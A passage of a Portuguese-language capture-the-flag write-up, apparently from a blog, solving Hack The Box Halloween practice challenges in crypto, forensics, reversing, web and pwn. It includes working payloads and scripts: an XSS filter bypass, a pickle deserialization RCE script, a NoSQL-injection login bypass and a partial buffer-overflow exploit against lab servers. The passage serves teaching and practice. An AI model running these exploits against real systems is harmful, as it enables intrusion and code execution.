</span></span><span class="line"><span class="cl">        <span class="n">bit</span> <span class="o">=</span> <span class="n">master_key</span> <span class="o">&amp;</span> <span class="mi">1</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">bit</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">password</span> <span class="o">+=</span> <span class="n">random</span><span class="o">.</span><span class="n">choice</span><span class="p">(</span><span class="n">ALPHABET</span><span class="p">[:</span><span class="nb">len</span><span class="p">(</span><span class="n">ALPHABET</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">password</span> <span class="o">+=</span> <span class="n">random</span><span class="o">.</span><span class="n">choice</span><span class="p">(</span><span class="n">ALPHABET</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">ALPHABET</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span><span class="p">:])</span>
</span></span><span class="line"><span class="cl">        <span class="n">master_key</span> <span class="o">&gt;&gt;=</span> <span class="mi">1</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">password</span>
</span></span></code></pre></div><p>A questão aqui é que é possível deduzir a master key a partir da senha gerada, devido à relação direta com as partes do alfabeto em que cada caractere da senha se encontra. Além disso, como a geração da senha percorreu os bits da master key do menos significativo para o mais significativo, acabamos obtendo os bits invertidos, exigindo, assim, uma reversão. Adicionalmente, ao converter a master key de bytes para int, foi empregado o formato little endian, o que implica que, após obter os bytes da master key, é necessário realizar uma inversão adicional.</p>
<p>Agora que possuímos a master key podemos descriptografar a flag utilizando o mesmo algoritmos que foi usado para encriptar, nesse caso o AES no modo ECB. E quando a flag foi escrita no output ela foi codificada para Base64 então é necessário decodificar antes.</p>
<p>Por fim temos o seguinte script para obter a flag:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">string</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64decode</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
</span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">long_to_bytes</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">ALPHABET</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span> <span class="o">+</span> <span class="n">string</span><span class="o">.</span><span class="n">digits</span> <span class="o">+</span> <span class="s1">&#39;~!@#$%^&amp;*&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">senha</span> <span class="o">=</span> <span class="s1">&#39;gBv#3%DXMV*7oCN2M71Zfe0QY^dS3ji7DgHxx2bNRCSoRPlVRRX*bwLO5eM&amp;0AIOa&amp;#$@u&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">flag</span> <span class="o">=</span> <span class="s1">&#39;tnP+MdNjHF1aMJVV/ciAYqQutsU8LyxVkJtVEf0J0T5j8Eu68AxcsKwd0NjY9CE+Be9e9FwSVF2xbK1GP53WSAaJuQaX/NC02D+v7S/yizQ=&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">masterKey</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span>
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">ch</span> <span class="ow">in</span> <span class="n">senha</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="n">masterKey</span> <span class="o">+=</span> <span class="s1">&#39;1&#39;</span> <span class="k">if</span> <span class="n">ch</span> <span class="ow">in</span> <span class="n">ALPHABET</span><span class="p">[:</span><span class="nb">len</span><span class="p">(</span><span class="n">ALPHABET</span><span class="p">)</span><span class="o">//</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="s1">&#39;0&#39;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">masterKey</span> <span class="o">=</span> <span class="n">masterKey</span><span class="p">[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">masterKey</span> <span class="o">=</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">masterKey</span><span class="p">,</span> <span class="mi">2</span><span class="p">))[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">encryptionKey</span> <span class="o">=</span> <span class="n">sha256</span><span class="p">(</span><span class="n">masterKey</span><span class="p">)</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">encryptionKey</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_ECB</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">flag</span> <span class="o">=</span> <span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">b64decode</span><span class="p">(</span><span class="n">flag</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</span></span></code></pre></div><p>Ao executar o script, a flag é revelada: HTB{00ps___n0t_th4t_h4rd_t0_r3c0v3r_th3_m4st3r_k3y_0f_my_p4ssw0rd_g3n3r4t0r}.</p>
<h1 id="forensics">Forensics</h1>
<h2 id="spooky-phishing">Spooky Phishing</h2>
<p>No desafio &ldquo;Spooky Phishing&rdquo;, recebemos um arquivo HTML que representa uma página de phishing. Dentro do código HTML, encontramos as seguintes linhas no início do corpo do documento:</p>
<pre tabindex="0"><code>  &lt;input class=&#34;li&#34; hidden value=&#34;Njg3NDc0NzA3MzNhMmYyZjc3Njk2ZTY0NmY3NzczNmM2OTc2NjU3NTcwNjQ2MTc0NjU3MjJlNjg3NDYyMmY0ODU0NDI3Yjcz&#34;&gt;
  &lt;input class=&#34;il&#34; hidden value=&#34;NzAzMDMwNmI3OTVmNzA2ODMxNzM2ODMxNmU2NzVmNzczMTc0Njg1ZjczNzAzMDMwNmI3OTVmNzM3MDcyMzMzNDY0NzM2ODMzMzM3NDczN2QyZjYxNzA3MDJlNzg2YzczNzgyZTY1Nzg2NQ==&#34;&gt;
</code></pre><p>Ao combinar os dois valores e decodificá-los, primeiro do Base64 e depois do hexadecimal, descobrimos uma URL que contém a flag HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/1.png" alt="phishing"  />
</p>
<h2 id="bat-problems">Bat Problems</h2>
<p>Agora recebemos um arquivo batch (.bat) que define várias variáveis e, em seguida, concatena o conteúdo delas para formar um comando codificado em Base64. Esse comando é posteriormente executado no PowerShell.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/2.png" alt="variáveis"  />
</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/3.png" alt="comando"  />
</p>
<p>Para resolver o desafio, usei o Hybrid Analysis, um serviço que fornece ambientes sandbox para executar e analisar arquivos maliciosos. Também poderia ter usado serviços semelhantes, como o any.run.</p>
<p>No relatório gerado pelo Hybrid Analysis, encontrei o comando que foi executado no PowerShell, que continha a flag: HTB{0bfusc4t3d_b4t_f1l3s_c4n_b3_4_m3ss}.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/4.png" alt="flag"  />
</p>
<h2 id="vulnerable-season">Vulnerable Season</h2>
<p>No terceiro desafio de forense, fomos fornecidos com um arquivo de logs de um servidor web que continha mais de 11 mil linhas de registros.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/5.png" alt="logs"  />
</p>
<p>Depois de analisar os logs é possível encontrar alguns que contém execução de comandos.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/6.png" alt="rce"  />
</p>
<p>Sendo que o da linha 11477 contém o seguinte comando:</p>
<pre tabindex="0"><code>Nz=Eg1n;az=5bDRuQ;Mz=fXIzTm;Kz=F9nMEx;Oz=7QlRI;Tz=4xZ0Vi;Vz=XzRfdDV;echo $Mz$Tz$Vz$az$Kz$Oz|base64 -d|rev
</code></pre><p>Que executando no terminal retorna a flag <strong>HTB{L0g_@n4ly5t_4_bEg1nN3r}</strong>.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/7.png" alt="execução"  />
</p>
<h1 id="reversing">Reversing</h1>
<h2 id="candybowl">CandyBowl</h2>
<p>Esse desafio de reverse é bem simples. É um executável que ao rodar espera 3 segundos e retorna um doce aleatório de um vetor de strings.</p>
<p>Usando o comando strings conseguimos obter a flag <strong>HTB{4lw4y5_ch3ck_ur_k1d5_c4ndy}</strong>.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/8.png" alt="strings"  />
</p>
<h2 id="ghostinthemachine">GhostInTheMachine</h2>
<p>Já nesse reverse o programa apenas lê alguns bytes do /dev/urandom e imprime na tela. Fazendo um disassembly pelo GDB podemos ver que há uma função getflag antes do comportamento que podemos ver do programa.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/9.png" alt="getflag"  />
</p>
<p>Então eu defini um breakpoint na instrução que chama a função ghost pois assim já passou pela getflag. E assim ao ver a memória temos a flag <strong>HTB{ex0rc1s1ng_th3_m4ch1n3}</strong>.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/10.png" alt="memória"  />
</p>
<h1 id="web">Web</h1>
<h2 id="candyvault">CandyVault</h2>
<p>O CandyVault é um desafio de web que apresenta apenas uma página de login.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/13.png" alt="login"  />
</p>
<p>Olhando que código-fonte que é fornecido, encontramos que a aplicação utiliza um banco de dados não relacional, o MongoDB, e que a flag é exibida quando se faz login com sucesso.</p>
<pre tabindex="0"><code>...
client = MongoClient(app.config[&#34;MONGO_URI&#34;])
...
app.route(&#34;/login&#34;, methods=[&#34;POST&#34;])
def login():
...
    elif content_type == &#34;application/json&#34;:
        data = request.get_json()
        email = data.get(&#34;email&#34;)
        password = data.get(&#34;password&#34;)
...
    if user:
        return render_template(&#34;candy.html&#34;, flag=open(&#34;flag.txt&#34;).read())
...
</code></pre><p>Dessa forma utilizando um payload de NoSQL Injection podemos bypassar a tela de login e obter a flag <strong>HTB{w3lc0m3_to0o0o_th3_c44andy_v4u1t!}</strong>.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/14.png" alt="injection"  />
</p>
<h2 id="spook-tastic">Spook Tastic</h2>
<p>Neste desafio, nos deparamos com uma página web na qual a única ação permitida é o envio de um email para se cadastrar na newsletter localizada no final da página.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/23.png" alt="page"  />
</p>
<p>Ao examinar o código-fonte em &ldquo;app.py&rdquo;, podemos observar que o email fornecido é validado somente se ele contém a palavra &lsquo;script&rsquo;, conforme o seguinte trecho de código:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">blacklist_pass</span><span class="p">(</span><span class="n">email</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">email</span> <span class="o">=</span> <span class="n">email</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="s2">&#34;script&#34;</span> <span class="ow">in</span> <span class="n">email</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="kc">False</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="kc">True</span>
</span></span></code></pre></div><p>Caso o email não contenha essa palavra, uma thread da função start_bot é criada. Esta função acessa a rota /bot e aguarda 3 segundos por um alerta na página. Quando um alerta é acionado, a função send_flag é chamada com o endereço IP do usuário como parâmetro.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">start_bot</span><span class="p">(</span><span class="n">user_ip</span><span class="p">):</span>
</span></span><span class="line"><span class="cl"><span class="o">...</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">browser</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;</span><span class="si">{</span><span class="n">HOST</span><span class="si">}</span><span class="s2">/bot?token=</span><span class="si">{</span><span class="n">BOT_TOKEN</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="n">WebDriverWait</span><span class="p">(</span><span class="n">browser</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">alert_is_present</span><span class="p">())</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="n">alert</span> <span class="o">=</span> <span class="n">browser</span><span class="o">.</span><span class="n">switch_to</span><span class="o">.</span><span class="n">alert</span>
</span></span><span class="line"><span class="cl">        <span class="n">alert</span><span class="o">.</span><span class="n">accept</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="n">send_flag</span><span class="p">(</span><span class="n">user_ip</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="o">...</span>
</span></span></code></pre></div><p>A função send_flag simplesmente lê o conteúdo do arquivo &ldquo;flag.txt&rdquo; e o envia para todos os clientes conectados no websocket que tenham o IP fornecido como parâmetro.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">send_flag</span><span class="p">(</span><span class="n">user_ip</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">for</span> <span class="nb">id</span><span class="p">,</span> <span class="n">ip</span> <span class="ow">in</span> <span class="n">socket_clients</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">ip</span> <span class="o">==</span> <span class="n">user_ip</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">socketio</span><span class="o">.</span><span class="n">emit</span><span class="p">(</span><span class="s2">&#34;flag&#34;</span><span class="p">,</span> <span class="p">{</span><span class="s2">&#34;flag&#34;</span><span class="p">:</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;flag.txt&#34;</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()},</span> <span class="n">room</span><span class="o">=</span><span class="nb">id</span><span class="p">)</span>
</span></span></code></pre></div><p>A página /bot é criada a partir de um template que renderiza todos os emails, e os caracteres não seguros são escapados usando o operador &lsquo;| safe&rsquo;.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="p">{</span><span class="o">%</span> <span class="k">for</span> <span class="n">email</span> <span class="ow">in</span> <span class="n">emails</span> <span class="o">%</span><span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="o">&lt;</span><span class="n">span</span><span class="o">&gt;</span><span class="p">{{</span> <span class="n">email</span><span class="o">|</span><span class="n">safe</span> <span class="p">}}</span><span class="o">&lt;/</span><span class="n">span</span><span class="o">&gt;&lt;</span><span class="n">br</span><span class="o">/&gt;</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span><span class="o">%</span> <span class="n">endfor</span> <span class="o">%</span><span class="p">}</span>
</span></span></code></pre></div><p>Para obter a flag, é necessário realizar um ataque de Cross-Site Scripting (XSS) para criar um alerta que não contenha a palavra &lsquo;script&rsquo; no payload. Isso pode ser alcançado com o seguinte payload:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o">&lt;</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="mi">0</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">/&gt;</span>
</span></span></code></pre></div><p>Dessa forma, recebemos a flag <strong>HTB{4l3rt5_c4us3_jumpsc4r35!!}</strong> via websocket.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/24.png" alt="websocket"  />
</p>
<h2 id="spellbound-servants">Spellbound Servants</h2>
<p>Neste desafio, somos apresentados a uma tela de login, mas, diferentemente de outros desafios, aqui temos a opção de criar uma conta.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/27.png" alt="login"  />
</p>
<p>Após criar uma conta e fazer login, somos redirecionados para a página /home.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/26.png" alt="home"  />
</p>
<p>Ao examinar o código-fonte da aplicação, descobrimos que a validação do usuário na página inicial é feita por meio de uma função decorator chamada isAuthenticated. Essa função verifica o usuário com base em um objeto serializado passado por meio do cookie &ldquo;auth&rdquo;.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">isAuthenticated</span><span class="p">(</span><span class="n">f</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="nd">@wraps</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">def</span> <span class="nf">decorator</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">cookies</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;auth&#39;</span><span class="p">,</span> <span class="kc">False</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="n">abort</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="s1">&#39;Unauthorised access detected!&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        
</span></span><span class="line"><span class="cl">        <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">user</span> <span class="o">=</span> <span class="n">pickle</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">base64</span><span class="o">.</span><span class="n">urlsafe_b64decode</span><span class="p">(</span><span class="n">token</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="n">kwargs</span><span class="p">[</span><span class="s1">&#39;user&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">user</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="n">f</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">except</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="n">abort</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="s1">&#39;Unauthorised access detected!&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">decorator</span>
</span></span></code></pre></div><p>Esse módulo pickle é vulnerável a execução de código durante a desserialização de objetos. Uma PoC para o exploit pode ser encontrada nesse artigo do <a href="https://exploit-notes.hdks.org/exploit/web/framework/python/python-pickle-rce/">exploit-notes</a>.</p>
<p>Com base nessa PoC, foi criado um script Python que explora a vulnerabilidade de execução de código remoto (RCE) para inserir a flag em um arquivo acessível no servidor web e, em seguida, faz uma requisição para obter a flag.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">pickle</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">base64</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">RCE</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="k">def</span> <span class="nf">__reduce__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">        <span class="n">cmd</span> <span class="o">=</span> <span class="p">(</span><span class="s1">&#39;cat /flag.txt &gt; /app/application/static/flag.txt&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">,</span> <span class="p">(</span><span class="n">cmd</span><span class="p">,)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">pickled</span> <span class="o">=</span> <span class="n">pickle</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">RCE</span><span class="p">())</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">urlsafe_b64encode</span><span class="p">(</span><span class="n">pickled</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">url</span> <span class="o">=</span> <span class="s1">&#39;http://94.237.53.58:44662&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s1">/home&#39;</span><span class="p">,</span> <span class="n">cookies</span><span class="o">=</span><span class="p">{</span><span class="s1">&#39;auth&#39;</span><span class="p">:</span> <span class="n">payload</span><span class="p">})</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s1">/static/flag.txt&#39;</span><span class="p">)</span><span class="o">.</span><span class="n">content</span><span class="p">)</span>
</span></span></code></pre></div><p>Ao executar esse script, a flag <strong>HTB{P1CkL3_15_f0R_SUP3R555!}</strong> é retornada.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/25.png" alt="flag"  />
</p>
<h1 id="pwn">Pwn</h1>
<h2 id="lesson">Lesson</h2>
<p>Esse desafio é muito diferente dos outros pois é uma sequência de perguntas que devem ser respondidas certas para conseguir a flag. E há um ELF para baixar que as perguntas são baseadas nele.</p>
<p>[*] Question number 0x1:</p>
<p>Is this a &lsquo;32-bit&rsquo; or &lsquo;64-bit&rsquo; ELF? (e.g. 1337-bit)</p>
<p>&gt;&gt; 64-bit</p>
<p>[*] Question number 0x2:</p>
<p>Which of these 3 protections are enabled (Canary, NX, PIE)?</p>
<p>&gt;&gt; NX</p>
<p>[*] Question number 0x3:</p>
<p>What do you need to enter so the message &lsquo;Welcome admin!&rsquo; is printed?</p>
<p>&gt;&gt; admin</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/11.png" alt="pwn"  />
</p>
<p>◉  HINT: This is the buffer &ndash;&gt; char name[0x20] = {0};  ◉</p>
<p>[*] Question number 0x4:</p>
<p>What is the size of the &rsquo;name&rsquo; buffer (in hex or decimal)?</p>
<p>&gt;&gt; 32</p>
<p>O valor 20 em hexadecimal pode ser convertido para 32 na base decimal.</p>
<p>◉  HINT: Only functions inside &lsquo;main()&rsquo; are called.      ◉</p>
<p>◉        Also, the functions these functions call.       ◉</p>
<p>[*] Question number 0x5:</p>
<p>Which custom function is never called? (e.g. vuln())</p>
<p>&gt;&gt; under_construction</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/12.png" alt="function"  />
</p>
<p>◉  HINT: Which function reads the string from the stdin?  ◉</p>
<p>[*] Question number 0x6:</p>
<p>What is the name of the standard function that could trigger a Buffer Overflow? (e.g. fprintf())</p>
<p>&gt;&gt; scanf</p>
<p>[*] Question number 0x7:</p>
<p>Insert 30, then 39, then 40 &lsquo;A&rsquo;s in the program and see the output.</p>
<p>After how many bytes a Segmentation Fault occurs (in hex or decimal)?</p>
<p>&gt;&gt; 40</p>
<p>[*] Question number 0x8:</p>
<p>What is the address of &lsquo;under_construction()&rsquo; in hex? (e.g. 0x401337)</p>
<p>&gt;&gt; 0x4011d6</p>
<p>Isso pode ser visto na penúltima imagem.</p>
<p>Ao responder essas 8 perguntas recebemos a flag <strong>HTB{pwn_101_w1th_s0m3_b0f}</strong>.</p>
<h2 id="lemonade-stand-v1">Lemonade Stand v1</h2>
<p>Este desafio é uma exploração de buffer overflow. No binário fornecido, somos informados de que temos 12 moedas e podemos pedir uma limonada normal ou grande. Se inserirmos um valor diferente, o programa nos dirá que eles não vendem uvas. Ao escolher o tamanho da limonada, se tivermos moedas suficientes, elas serão deduzidas do total; caso contrário, o programa perguntará se queremos fazer um empréstimo, e se aceitarmos, ele solicitará um nome e sobrenome.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/18.png" alt="lemonade"  />
</p>
<p>Usando o Cutter para decompilar o programa, podemos ver um &ldquo;main&rdquo; bastante simples que apenas chama o menu e as funções &ldquo;buy&rdquo; dependendo do tamanho escolhido.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/15.png" alt="main"  />
</p>
<p>A função &ldquo;buy_large&rdquo; verifica apenas se temos 5 moedas; se tivermos, as moedas são deduzidas, caso contrário, a função &ldquo;save_creds&rdquo; é chamada. &ldquo;buy_normal&rdquo; faz o mesmo, mas considera 3 moedas.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/16.png" alt="buy"  />
</p>
<p>A função &ldquo;save_creds&rdquo; é a que oferece uma limonada grátis ao inserir um nome e sobrenome. No entanto, o buffer alocado para salvar o sobrenome tem 64 bytes, enquanto a função &ldquo;read&rdquo; que lê o sobrenome é passada como argumento 0x4a, o que significa que serão lidos 74 bytes.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/17.png" alt="save_creds"  />
</p>
<p>Além disso, há uma função não chamada durante a execução normal do programa chamada &ldquo;grapes&rdquo;, que lê o arquivo &ldquo;flag.txt&rdquo; e imprime o conteúdo na tela. Essa função está no endereço 0x004008cf.</p>
<p><img loading="lazy" src="/images/htb-boo23_practice/19.png" alt="grapes"  />
</p>
<p>Para obter a flag, é necessário realizar um buffer overflow no array onde o sobrenome é armazenado, substituindo o endereço de retorno para o endereço da função &ldquo;grapes&rdquo;. Dessa forma, em vez de retornar à função &ldquo;save_creds&rdquo; após a leitura da entrada do usuário, o programa retornará ao endereço que especificamos.</p>
<p>O programa com a flag real é executado no servidor do Hack the Box, e temos o endereço IP e a porta para nos conectar. Após a conexão, é necessário solicitar uma limonada grande três vezes para gastar todas as moedas e, em seguida, chamar a função &ldquo;save_coins&rdquo;. Em seguida, passamos um nome e, ao inserir o sobrenome, inserimos 72 bytes aleatórios e o endereço da função &ldquo;grapes,&rdquo; preenchendo assim os 74 bytes lidos.</p>
<p>Aqui está o script em Python para realizar o que foi explicado acima:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">pwn</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">ip</span> <span class="o">=</span> <span class="s1">&#39;94.237.49.11&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="mi">44822</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">r</span> <span class="o">=</span> <span class="n">pwn</span><span class="o">.</span><span class="n">remote</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span><span class="n">port</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="n">r</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s1">&#39;&gt;&gt;&#39;</span><span class="p">,</span> <span class="s1">&#39;2&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s1">&#39;&gt;&gt;&#39;</span><span class="p">,</span> <span class="s1">&#39;1&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">r</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s1">&#39;name: &#39;</span><span class="p">,</span> <span class="s1">&#39;lucas&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
